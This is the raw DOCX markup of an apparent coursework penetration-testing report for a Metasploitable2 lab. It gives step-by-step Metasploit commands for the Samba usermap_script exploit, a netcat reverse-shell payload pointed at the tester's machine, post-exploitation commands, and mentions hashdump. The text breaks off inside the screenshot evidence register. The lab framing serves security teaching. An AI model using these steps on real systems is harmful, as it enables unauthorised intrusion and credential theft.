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DEB2" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="44"/>
        </w:rPr>
        <w:t>PENETRATION TESTING REPORT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C23A37" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Metasploitable2 — Controlled Metasploit Exploitation Lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E402ADF" w14:textId="18A3146A" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br/>
        <w:t>Environment: Kali Linux → VMware Host-Only Network → Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB96D26" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>1. Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9D373A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>This report documents a controlled penetration-testing exercise against an intentionally vulnerable Metasploitable2 virtual machine. The supplied lab specifies a workflow beginning with Nmap/Nessus vulnerability identification, followed by exploitation of the Samba usermap_script vulnerability using Metasploit, establishment of a reverse shell, validation of system access, limited post-exploitation enumeration, risk analysis, and remediation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C5C7F9D" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>All activities described here are intended for the isolated VMware Host-Only laboratory network only. Actual evidence screenshots must be inserted from the student's lab session; the placeholders in this report are deliberately not presented as proof of exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6398982E" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>2. Scope and Lab Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7012F6FF" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Target: Metasploitable2 vulnerable VM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229A901F" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Attacker: Kali Linux with Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97B5ED" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Network: VMware Host-Only</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2B1592" w14:textId="18516A3B" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">Example Kali IP: </w:t>
      </w:r>
      <w:r w:rsidR="004C20E7">
        <w:t>192.168.23.1</w:t>
      </w:r>
      <w:r w:rsidR="006509B6">
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E75F07" w14:textId="6ADAF3AC" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Example Target IP: 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="006509B6">
        <w:t>23.130</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0371F784" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>3. Assessment Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46312DE3" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Identify an exploitable service from scan results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BA3A60" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Use Metasploit Framework to exploit a known vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5E57B4" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Configure and establish a reverse-shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345784A2" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Verify the compromised system and resulting privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C881897" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Perform limited post-exploitation checks including sysinfo/hashdump where supported.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C241540" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>Document exploitation evidence, security impact, and mitigations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4FFB28" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>4. Attack Path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A63359A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Nmap → Samba Service Identified → Nessus Vulnerability Finding → Metasploit Exploit Selected → Exploit Successful → Reverse Shell → System Access → sysinfo → hashdump → Security Impact Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207BBFCA" w14:textId="77777777" w:rsidR="004C20E7" w:rsidRDefault="004C20E7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B0C2965" w14:textId="54C18E45" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Vulnerability Identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9CB000" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The supplied lab identifies the Samba usermap_script vulnerability as the exercise's exploitation target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5218E590" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Relevant service: Samba/SMB. The supplied lab associates the exploitation configuration with RPORT 139.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202B9F01" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Evidence required: Nmap output identifying the relevant service and the corresponding Nessus finding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447FAD19" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6. Exploitation Methodology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712079B6" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.1 Verify target connectivity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EA2EF6" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Use ip addr on Kali, ping the target, and perform an Nmap service/version scan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E18379D" w14:textId="77777777" w:rsidR="000A57D6" w:rsidRDefault="000A57D6" w:rsidP="000A57D6">
      <w:r>
        <w:t>ip addr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521A4C83" w14:textId="783EA46B" w:rsidR="000A57D6" w:rsidRDefault="000A57D6" w:rsidP="000A57D6">
      <w:r>
        <w:t xml:space="preserve">ping -c 4 </w:t>
      </w:r>
      <w:r w:rsidR="00D27F43">
        <w:t>192.168.23.1</w:t>
      </w:r>
      <w:r w:rsidR="00D27F43">
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F62C8F" w14:textId="500BE312" w:rsidR="000A57D6" w:rsidRDefault="000A57D6" w:rsidP="000A57D6">
      <w:r>
        <w:t xml:space="preserve">sudo nmap -sS -sV </w:t>
      </w:r>
      <w:r w:rsidR="00D27F43">
        <w:t>192.168.23.1</w:t>
      </w:r>
      <w:r w:rsidR="00D27F43">
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD3F186" w14:textId="77777777" w:rsidR="000A57D6" w:rsidRDefault="000A57D6"/>
    <w:p w14:paraId="04183FF4" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.2 Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315A2A0A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Launch msfconsole and verify the framework version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790B176D" w14:textId="77777777" w:rsidR="0041391C" w:rsidRDefault="0041391C" w:rsidP="0041391C">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398EA569" w14:textId="77777777" w:rsidR="0041391C" w:rsidRDefault="0041391C" w:rsidP="0041391C">
      <w:r>
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D3C80A" w14:textId="77777777" w:rsidR="0041391C" w:rsidRDefault="0041391C"/>
    <w:p w14:paraId="6B0B9686" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.3 Search for the module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A8B2A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Search for usermap_script and review exploit information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B4C62" w14:textId="77777777" w:rsidR="0041391C" w:rsidRDefault="0041391C" w:rsidP="0041391C">
      <w:r>
        <w:t>search usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE07B2" w14:textId="77777777" w:rsidR="0041391C" w:rsidRDefault="0041391C" w:rsidP="0041391C">
      <w:r>
        <w:t>info exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8BB752" w14:textId="77777777" w:rsidR="0041391C" w:rsidRDefault="0041391C"/>
    <w:p w14:paraId="61D9A718" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.4 Load the exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75EC1F94" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Use exploit/multi/samba/usermap_script and review show options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1700A49E" w14:textId="77777777" w:rsidR="005A403E" w:rsidRDefault="005A403E" w:rsidP="005A403E">
      <w:r>
        <w:t>use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB80390" w14:textId="77777777" w:rsidR="005A403E" w:rsidRDefault="005A403E" w:rsidP="005A403E">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A5B700" w14:textId="77777777" w:rsidR="005A403E" w:rsidRDefault="005A403E"/>
    <w:p w14:paraId="3BD3B56B" w14:textId="77777777" w:rsidR="004C20E7" w:rsidRDefault="004C20E7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E846520" w14:textId="4679703D" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.5 Configure the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38288046" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Set RHOSTS to the actual Metasploitable2 lab address and verify options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C09570B" w14:textId="5FA2ED3A" w:rsidR="00914168" w:rsidRDefault="00914168" w:rsidP="00914168">
      <w:r>
        <w:t xml:space="preserve">set RHOSTS </w:t>
      </w:r>
      <w:r w:rsidR="006B1AAE">
        <w:t>192.168.23.1</w:t>
      </w:r>
      <w:r w:rsidR="006B1AAE">
        <w:t>30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5D0600" w14:textId="77777777" w:rsidR="00914168" w:rsidRDefault="00914168" w:rsidP="00914168">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143DEDE6" w14:textId="77777777" w:rsidR="00914168" w:rsidRDefault="00914168"/>
    <w:p w14:paraId="04CDDCD1" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.6 Configure the reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689CFA2A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Select a compatible Unix reverse-shell payload; the supplied example uses cmd/unix/reverse_netcat, with LHOST set to Kali and LPORT 4444.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2B3EC6" w14:textId="77777777" w:rsidR="00846547" w:rsidRDefault="00846547" w:rsidP="00846547">
      <w:r>
        <w:t>show payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22143F79" w14:textId="77777777" w:rsidR="00846547" w:rsidRDefault="00846547" w:rsidP="00846547">
      <w:r>
        <w:t>set payload cmd/unix/reverse_netcat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD3BD13" w14:textId="77777777" w:rsidR="00846547" w:rsidRDefault="00846547" w:rsidP="00846547">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0983FA" w14:textId="01315A40" w:rsidR="00846547" w:rsidRDefault="00846547" w:rsidP="00846547">
      <w:r>
        <w:t xml:space="preserve">set LHOST </w:t>
      </w:r>
      <w:r w:rsidR="004C20E7">
        <w:t>192.168.23.129</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18F43F" w14:textId="77777777" w:rsidR="00846547" w:rsidRDefault="00846547" w:rsidP="00846547">
      <w:r>
        <w:t>set LPORT 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533781F2" w14:textId="77777777" w:rsidR="00846547" w:rsidRDefault="00846547"/>
    <w:p w14:paraId="69361EF5" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.7 Execute</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4E86F3" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Verify the configuration, then run/exploit and document whether a session opens.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB521ED" w14:textId="77777777" w:rsidR="00EE1A85" w:rsidRDefault="00EE1A85" w:rsidP="00EE1A85">
      <w:r>
        <w:t>show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D8E4D2" w14:textId="77777777" w:rsidR="00EE1A85" w:rsidRDefault="00EE1A85" w:rsidP="00EE1A85">
      <w:r>
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043DB1E3" w14:textId="77777777" w:rsidR="00EE1A85" w:rsidRDefault="00EE1A85"/>
    <w:p w14:paraId="4B9C1256" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>6.8 Validate session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7842F6" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Use sessions and sessions -i &lt;ID&gt; to interact with the authorized target.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387C9D65" w14:textId="77777777" w:rsidR="004871FF" w:rsidRDefault="004871FF" w:rsidP="004871FF">
      <w:r>
        <w:t>sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FAF0D40" w14:textId="77777777" w:rsidR="004871FF" w:rsidRDefault="004871FF" w:rsidP="004871FF">
      <w:r>
        <w:t>sessions -i 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ADA96A" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Post-Exploitation Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26491D61" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Run whoami, id, hostname, and uname -a from the resulting shell. Record the target hostname, current user, UID/GID, and operating-system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D7DD43" w14:textId="77777777" w:rsidR="00407258" w:rsidRDefault="00407258" w:rsidP="00407258">
      <w:r>
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C504190" w14:textId="77777777" w:rsidR="00407258" w:rsidRDefault="00407258" w:rsidP="00407258">
      <w:r>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEFEC35" w14:textId="77777777" w:rsidR="00407258" w:rsidRDefault="00407258" w:rsidP="00407258">
      <w:r>
        <w:t>hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08457E41" w14:textId="77777777" w:rsidR="00407258" w:rsidRDefault="00407258" w:rsidP="00407258">
      <w:r>
        <w:t>uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD25059" w14:textId="77777777" w:rsidR="00407258" w:rsidRDefault="00407258"/>
    <w:p w14:paraId="5DF8CBDB" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>For Meterpreter sessions, sysinfo can provide computer, OS, architecture, and domain information. The supplied lab explicitly notes that sysinfo is a Meterpreter command and may not be available in a basic Unix command shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB1848D" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>If sufficient privileges and a compatible session are available, hashdump may retrieve password hashes. Do not crack or reuse any captured credentials outside the isolated lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26066DE1" w14:textId="77777777" w:rsidR="0093449D" w:rsidRDefault="0093449D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3136CF98" w14:textId="2A915F6C" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>8. Evidence Register — Insert Actual Screenshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6C0CE" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-01 — Metasploitable2 running</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF565C" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Screenshot of target VM / lab state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0038331B" w14:textId="03645402" w:rsidR="00CF5A93" w:rsidRDefault="00CF5A93">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF78A93" wp14:editId="58CD73CC">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="33867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71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93C8" w14:textId="658D7E6E" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-02 — Nmap service identification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1421E" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Nmap output showing the relevant Samba service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F770CCE" w14:textId="536A77CB" w:rsidR="00CF5A93" w:rsidRDefault="00CF5A93">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="36829245" wp14:editId="11DA262A">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="97133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36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C5C2" w14:textId="5CE02EFA" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-03 — Metasploit module</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C006E2E" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Exploit module and information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9F7A63" w14:textId="3FAE7315" w:rsidR="00CF5A93" w:rsidRDefault="00EC4590">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2281CA71" wp14:editId="2C446E40">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="121067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70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4641" w14:textId="0298783E" w:rsidR="00EC4590" w:rsidRDefault="00CB606F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E498C2F" wp14:editId="3E10ACEC">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="28233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32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B839" w14:textId="2EEB1C0A" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9B308F" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-04 — Metasploit show options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03708E3B" w14:textId="3E8CC3E4" w:rsidR="00CB606F" w:rsidRDefault="00000000" w:rsidP="007B5EF7">
      <w:r>
        <w:t>RHOSTS/RPORT and payload configuration</w:t>
      </w:r>
      <w:r w:rsidR="000A6A7C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CA4CE0E" wp14:editId="62D5D207">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="144003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32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E9E5" w14:textId="77777777" w:rsidR="007B5EF7" w:rsidRDefault="007B5EF7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1334A9E5" w14:textId="686991EC" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-05 — Successful exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666675F4" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Handler/session-open evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62C8DD" w14:textId="51123BA4" w:rsidR="007B5EF7" w:rsidRDefault="007B5EF7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4386DD8B" wp14:editId="631531E2">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="166115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58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1399" w14:textId="77777777" w:rsidR="007B5EF7" w:rsidRDefault="007B5EF7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E2D13F0" w14:textId="77777777" w:rsidR="007B5EF7" w:rsidRDefault="007B5EF7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AF19935" w14:textId="4B3DD54F" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-06 — Reverse shell/session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118F4532" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Active session and interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE19AAF" w14:textId="51D3EB01" w:rsidR="007B5EF7" w:rsidRDefault="007B5EF7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="49EB718F" wp14:editId="22EDF55D">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="11165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37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38F7" w14:textId="3F2789E3" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-07 — whoami / id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD249C7" w14:textId="28B360FD" w:rsidR="00EB43EA" w:rsidRDefault="00000000" w:rsidP="00F5439F">
      <w:r>
        <w:t>Identity and privilege evidence</w:t>
      </w:r>
      <w:r w:rsidR="00F5439F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="180B500A" wp14:editId="44C213AB">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="105807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72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D325" w14:textId="77777777" w:rsidR="00EB43EA" w:rsidRDefault="00EB43EA">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07AA7548" w14:textId="77777777" w:rsidR="00F5439F" w:rsidRDefault="00F5439F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A9497AE" w14:textId="049C9FC8" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>E-08 — sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418BDD08" w14:textId="77777777" w:rsidR="00864321" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Meterpreter system information, if used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159DD39B" w14:textId="33E6C4FF" w:rsidR="00F5439F" w:rsidRDefault="00F5439F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37204214" wp14:editId="5489DE06">
            <wp:extent cx="6400800" cy="3598545"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
